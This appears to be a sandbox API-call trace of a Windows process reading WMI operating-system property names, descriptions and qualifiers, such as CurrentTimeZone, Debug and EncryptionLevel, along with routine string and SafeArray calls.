	[0111.135] IWbemClassObject:Get (in: This=0x2ad20696350, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CurrentTimeZone indicates the number of minutes the operating system is offset from Greenwich Mean Time. Either the number is positive, negative or zero.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.135] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.136] lstrlenA (lpString="") returned 0
	[0111.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c160, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.136] SysStringLen (param_1="CurrentTimeZone indicates the number of minutes the operating system is offset from Greenwich Mean Time. Either the number is positive, negative or zero.") returned 0x99
	[0111.136] SysStringLen (param_1="") returned 0x0
	[0111.136] GetCurrentThreadId () returned 0x6bc
	[0111.136] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.136] IWbemClassObject:Get (in: This=0x2ad20696350, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.136] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.137] SysStringLen (param_1="CurrentTimeZone") returned 0xf
	[0111.137] SysStringLen (param_1="BuildNumber") returned 0xb
	[0111.137] SysStringLen (param_1="CurrentTimeZone") returned 0xf
	[0111.137] SysStringLen (param_1="CodeSet") returned 0x7
	[0111.137] SysStringLen (param_1="CurrentTimeZone") returned 0xf
	[0111.137] SysStringLen (param_1="CountryCode") returned 0xb
	[0111.137] SysStringLen (param_1="CountryCode") returned 0xb
	[0111.137] SysStringLen (param_1="CurrentTimeZone") returned 0xf
	[0111.138] IUnknown:Release (This=0x2ad20696350) returned 0x1
	[0111.138] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.138] IWbemClassObject:Get (in: This=0x2ad20697fe0, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20641368, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Debug", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.138] IWbemClassObject:Get (in: This=0x2ad20697fe0, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064b778, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Debug", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.138] GetCurrentThreadId () returned 0x6bc
	[0111.138] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.139] IWbemClassObject:Get (in: This=0x2ad20697fe0, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The Debug property indicates whether the operating system is a checked (debug) build. Checked builds provide error checking, argument verification, and system debugging code. Additional code in a checked binary generates a kernel debugger error message and breaks into the debugger. This helps  immediately determine the cause and location of the error. Performance suffers in the checked build due to the additional code that is executed./nValues: TRUE or FALSE, A value of TRUE indicates the debugging version of User.exe is installed.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.140] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.140] lstrlenA (lpString="") returned 0
	[0111.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c0c0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.140] SysStringLen (param_1="The Debug property indicates whether the operating system is a checked (debug) build. Checked builds provide error checking, argument verification, and system debugging code. Additional code in a checked binary generates a kernel debugger error message and breaks into the debugger. This helps  immediately determine the cause and location of the error. Performance suffers in the checked build due to the additional code that is executed./nValues: TRUE or FALSE, A value of TRUE indicates the debugging version of User.exe is installed.") returned 0x219
	[0111.140] SysStringLen (param_1="") returned 0x0
	[0111.140] GetCurrentThreadId () returned 0x6bc
	[0111.140] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.141] IWbemClassObject:Get (in: This=0x2ad20697fe0, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.141] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.142] SysStringLen (param_1="Debug") returned 0x5
	[0111.142] SysStringLen (param_1="BuildNumber") returned 0xb
	[0111.142] SysStringLen (param_1="Debug") returned 0x5
	[0111.142] SysStringLen (param_1="CodeSet") returned 0x7
	[0111.142] SysStringLen (param_1="Debug") returned 0x5
	[0111.142] SysStringLen (param_1="CountryCode") returned 0xb
	[0111.142] SysStringLen (param_1="Debug") returned 0x5
	[0111.142] SysStringLen (param_1="CurrentTimeZone") returned 0xf
	[0111.142] SysStringLen (param_1="CurrentTimeZone") returned 0xf
	[0111.142] SysStringLen (param_1="Debug") returned 0x5
	[0111.142] IUnknown:Release (This=0x2ad20697fe0) returned 0x1
	[0111.142] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.143] IWbemClassObject:Get (in: This=0x2ad206977d0, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20653168, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Description", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.143] IWbemClassObject:Get (in: This=0x2ad206977d0, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206531c8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Description", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.143] GetCurrentThreadId () returned 0x6bc
	[0111.143] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.143] IWbemClassObject:Get (in: This=0x2ad206977d0, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The Description property provides a description of the Windows operating system. Some user interfaces (those that allow editing of this description) limit its length to 48 characters.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.144] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.144] lstrlenA (lpString="") returned 0
	[0111.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c170, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.144] SysStringLen (param_1="The Description property provides a description of the Windows operating system. Some user interfaces (those that allow editing of this description) limit its length to 48 characters.") returned 0xb7
	[0111.144] SysStringLen (param_1="") returned 0x0
	[0111.145] GetCurrentThreadId () returned 0x6bc
	[0111.145] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.145] IWbemClassObject:Get (in: This=0x2ad206977d0, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.145] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.146] SysStringLen (param_1="Description") returned 0xb
	[0111.146] SysStringLen (param_1="BuildNumber") returned 0xb
	[0111.146] SysStringLen (param_1="Description") returned 0xb
	[0111.146] SysStringLen (param_1="CodeSet") returned 0x7
	[0111.146] SysStringLen (param_1="Description") returned 0xb
	[0111.146] SysStringLen (param_1="CurrentTimeZone") returned 0xf
	[0111.146] SysStringLen (param_1="Description") returned 0xb
	[0111.146] SysStringLen (param_1="Debug") returned 0x5
	[0111.146] SysStringLen (param_1="Debug") returned 0x5
	[0111.146] SysStringLen (param_1="Description") returned 0xb
	[0111.146] IUnknown:Release (This=0x2ad206977d0) returned 0x1
	[0111.146] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.147] IWbemClassObject:Get (in: This=0x2ad20697270, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20652d78, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Distributed", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.147] IWbemClassObject:Get (in: This=0x2ad20697270, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20652aa8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Distributed", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.147] GetCurrentThreadId () returned 0x6bc
	[0111.147] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.147] IWbemClassObject:Get (in: This=0x2ad20697270, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Boolean indicating whether the operating system is distributed across several computer system nodes. If so, these nodes should be grouped as a cluster.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.148] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.148] lstrlenA (lpString="") returned 0
	[0111.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c140, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.148] SysStringLen (param_1="Boolean indicating whether the operating system is distributed across several computer system nodes. If so, these nodes should be grouped as a cluster.") returned 0x97
	[0111.148] SysStringLen (param_1="") returned 0x0
	[0111.148] GetCurrentThreadId () returned 0x6bc
	[0111.148] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.149] IWbemClassObject:Get (in: This=0x2ad20697270, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.149] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.150] SysStringLen (param_1="Distributed") returned 0xb
	[0111.150] SysStringLen (param_1="CodeSet") returned 0x7
	[0111.150] SysStringLen (param_1="Distributed") returned 0xb
	[0111.150] SysStringLen (param_1="CurrentTimeZone") returned 0xf
	[0111.150] SysStringLen (param_1="Distributed") returned 0xb
	[0111.150] SysStringLen (param_1="Debug") returned 0x5
	[0111.150] SysStringLen (param_1="Distributed") returned 0xb
	[0111.150] SysStringLen (param_1="Description") returned 0xb
	[0111.150] SysStringLen (param_1="Description") returned 0xb
	[0111.150] SysStringLen (param_1="Distributed") returned 0xb
	[0111.151] IUnknown:Release (This=0x2ad20697270) returned 0x1
	[0111.151] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.151] IWbemClassObject:Get (in: This=0x2ad20696a60, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20652b08, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="EncryptionLevel", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.151] IWbemClassObject:Get (in: This=0x2ad20696a60, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20652ce8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="EncryptionLevel", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.151] GetCurrentThreadId () returned 0x6bc
	[0111.151] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.152] IWbemClassObject:Get (in: This=0x2ad20696a60, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The EncryptionLevel property specifies if the encryption level for secure transactions is 40-bit, 128-bit, or n-bit encryption.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.152] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.153] lstrlenA (lpString="") returned 0
	[0111.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c1f0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.153] SysStringLen (param_1="The EncryptionLevel property specifies if the encryption level for secure transactions is 40-bit, 128-bit, or n-bit encryption.") returned 0x7f
	[0111.153] SysStringLen (param_1="") returned 0x0
	[0111.153] GetCurrentThreadId () returned 0x6bc
	[0111.153] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.153] IWbemClassObject:Get (in: This=0x2ad20696a60, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064b180*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x2ad20633170, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.153] SafeArrayGetLBound (in: psa=0x2ad2064b180, nDim=0x1, plLbound=0xd7edd8f164 | out: plLbound=0xd7edd8f164) returned 0x0
	[0111.153] SafeArrayGetUBound (in: psa=0x2ad2064b180, nDim=0x1, plUbound=0xd7edd8f168 | out: plUbound=0xd7edd8f168) returned 0x0
	[0111.153] SafeArrayGetElement (in: psa=0x2ad2064b180, rgIndices=0xd7edd8f140, pv=0xd7edd8f138 | out: pv=0xd7edd8f138) returned 0x0
	[0111.154] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="Name", lFlags=0, pVal=0xd7edd8f180*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f180*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Values", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.154] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="QualifierValue", lFlags=0, pVal=0xd7edd8f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1b8*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064b500*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2ad20633a20, rgsabound=((cElements=0x3, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.154] SafeArrayGetLBound (in: psa=0x2ad2064b500, nDim=0x1, plLbound=0xd7edd8f15c | out: plLbound=0xd7edd8f15c) returned 0x0
	[0111.154] SafeArrayGetUBound (in: psa=0x2ad2064b500, nDim=0x1, plUbound=0xd7edd8f158 | out: plUbound=0xd7edd8f158) returned 0x0
	[0111.154] lstrlenW (lpString="CIMTYPE") returned 7
	[0111.154] lstrlenW (lpString="Values") returned 6
	[0111.154] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3
	[0111.154] lstrlenW (lpString="read") returned 4
	[0111.154] lstrlenW (lpString="Values") returned 6
	[0111.154] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="read", cchCount2=4) returned 3
	[0111.154] lstrlenW (lpString="write") returned 5
	[0111.154] lstrlenW (lpString="Values") returned 6
	[0111.154] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="write", cchCount2=5) returned 1
	[0111.154] lstrlenW (lpString="In") returned 2
	[0111.154] lstrlenW (lpString="Values") returned 6
	[0111.154] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="In", cchCount2=2) returned 3
	[0111.154] lstrlenW (lpString="Out") returned 3
	[0111.155] lstrlenW (lpString="Values") returned 6
	[0111.155] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="Out", cchCount2=3) returned 3
	[0111.155] SafeArrayGetElement (in: psa=0x2ad2064b500, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.156] SafeArrayGetElement (in: psa=0x2ad2064b500, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.156] SafeArrayGetElement (in: psa=0x2ad2064b500, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.157] IUnknown:Release (This=0x2ad206a72f0) returned 0x1
	[0111.157] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.158] SysStringLen (param_1="EncryptionLevel") returned 0xf
	[0111.158] SysStringLen (param_1="CodeSet") returned 0x7
	[0111.158] SysStringLen (param_1="EncryptionLevel") returned 0xf
	[0111.158] SysStringLen (param_1="CurrentTimeZone") returned 0xf
	[0111.158] SysStringLen (param_1="EncryptionLevel") returned 0xf
	[0111.158] SysStringLen (param_1="Description") returned 0xb
	[0111.158] SysStringLen (param_1="EncryptionLevel") returned 0xf
	[0111.158] SysStringLen (param_1="Distributed") returned 0xb
	[0111.158] SysStringLen (param_1="Distributed") returned 0xb
	[0111.158] SysStringLen (param_1="EncryptionLevel") returned 0xf
	[0111.204] IUnknown:Release (This=0x2ad20696a60) returned 0x1
	[0111.204] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.205] IWbemClassObject:Get (in: This=0x2ad20696d10, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064b778, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ForegroundApplicationBoost", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.205] IWbemClassObject:Get (in: This=0x2ad20696d10, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064b738, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ForegroundApplicationBoost", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.205] GetCurrentThreadId () returned 0x6bc
	[0111.205] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.206] IWbemClassObject:Get (in: This=0x2ad20696d10, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The ForegroundApplicationBoost property indicates the increase in priority given to the foreground application. On computer systems running Windows NT 4.0 and Windows 2000, application boost is implemented by giving an application more execution time slices (quantum lengths). A ForegroundApplicationBoost value of 0 indicates the system boosts the quantum length by 6; if 1, then 12; and if 2 then 18. On Windows NT 3.51 and earlier, application boost is implemented by increasing the scheduling priority. For these systems, the scheduling priority is increased by the value of this property. The default value is 2.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.206] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.206] lstrlenA (lpString="") returned 0
	[0111.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c240, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.207] SysStringLen (param_1="The ForegroundApplicationBoost property indicates the increase in priority given to the foreground application. On computer systems running Windows NT 4.0 and Windows 2000, application boost is implemented by giving an application more execution time slices (quantum lengths). A ForegroundApplicationBoost value of 0 indicates the system boosts the quantum length by 6; if 1, then 12; and if 2 then 18. On Windows NT 3.51 and earlier, application boost is implemented by increasing the scheduling priority. For these systems, the scheduling priority is increased by the value of this property. The default value is 2.") returned 0x269
	[0111.207] SysStringLen (param_1="") returned 0x0
	[0111.207] GetCurrentThreadId () returned 0x6bc
	[0111.207] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.207] IWbemClassObject:Get (in: This=0x2ad20696d10, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064b180*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x2ad20632e80, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.207] SafeArrayGetLBound (in: psa=0x2ad2064b180, nDim=0x1, plLbound=0xd7edd8f164 | out: plLbound=0xd7edd8f164) returned 0x0
	[0111.207] SafeArrayGetUBound (in: psa=0x2ad2064b180, nDim=0x1, plUbound=0xd7edd8f168 | out: plUbound=0xd7edd8f168) returned 0x0
	[0111.207] SafeArrayGetElement (in: psa=0x2ad2064b180, rgIndices=0xd7edd8f140, pv=0xd7edd8f138 | out: pv=0xd7edd8f138) returned 0x0
	[0111.208] IWbemClassObject:Get (in: This=0x2ad206a62d0, wszName="Name", lFlags=0, pVal=0xd7edd8f180*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f180*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Values", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.208] IWbemClassObject:Get (in: This=0x2ad206a62d0, wszName="QualifierValue", lFlags=0, pVal=0xd7edd8f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1b8*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064b500*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2ad20633be0, rgsabound=((cElements=0x3, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.208] SafeArrayGetLBound (in: psa=0x2ad2064b500, nDim=0x1, plLbound=0xd7edd8f15c | out: plLbound=0xd7edd8f15c) returned 0x0
	[0111.208] SafeArrayGetUBound (in: psa=0x2ad2064b500, nDim=0x1, plUbound=0xd7edd8f158 | out: plUbound=0xd7edd8f158) returned 0x0
	[0111.208] lstrlenW (lpString="CIMTYPE") returned 7
	[0111.208] lstrlenW (lpString="Values") returned 6
	[0111.208] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3
	[0111.208] lstrlenW (lpString="read") returned 4
	[0111.208] lstrlenW (lpString="Values") returned 6
	[0111.208] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="read", cchCount2=4) returned 3
	[0111.208] lstrlenW (lpString="write") returned 5
	[0111.208] lstrlenW (lpString="Values") returned 6
	[0111.208] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="write", cchCount2=5) returned 1
	[0111.208] lstrlenW (lpString="In") returned 2
	[0111.208] lstrlenW (lpString="Values") returned 6
	[0111.208] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="In", cchCount2=2) returned 3
	[0111.208] lstrlenW (lpString="Out") returned 3
	[0111.208] lstrlenW (lpString="Values") returned 6
	[0111.208] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="Out", cchCount2=3) returned 3
	[0111.208] SafeArrayGetElement (in: psa=0x2ad2064b500, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.208] SafeArrayGetElement (in: psa=0x2ad2064b500, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.209] SafeArrayGetElement (in: psa=0x2ad2064b500, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.209] IUnknown:Release (This=0x2ad206a62d0) returned 0x1
	[0111.209] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.209] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a
	[0111.209] SysStringLen (param_1="CodeSet") returned 0x7
	[0111.209] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a
	[0111.209] SysStringLen (param_1="CurrentTimeZone") returned 0xf
	[0111.210] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a
	[0111.210] SysStringLen (param_1="Description") returned 0xb
	[0111.210] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a
	[0111.210] SysStringLen (param_1="Distributed") returned 0xb
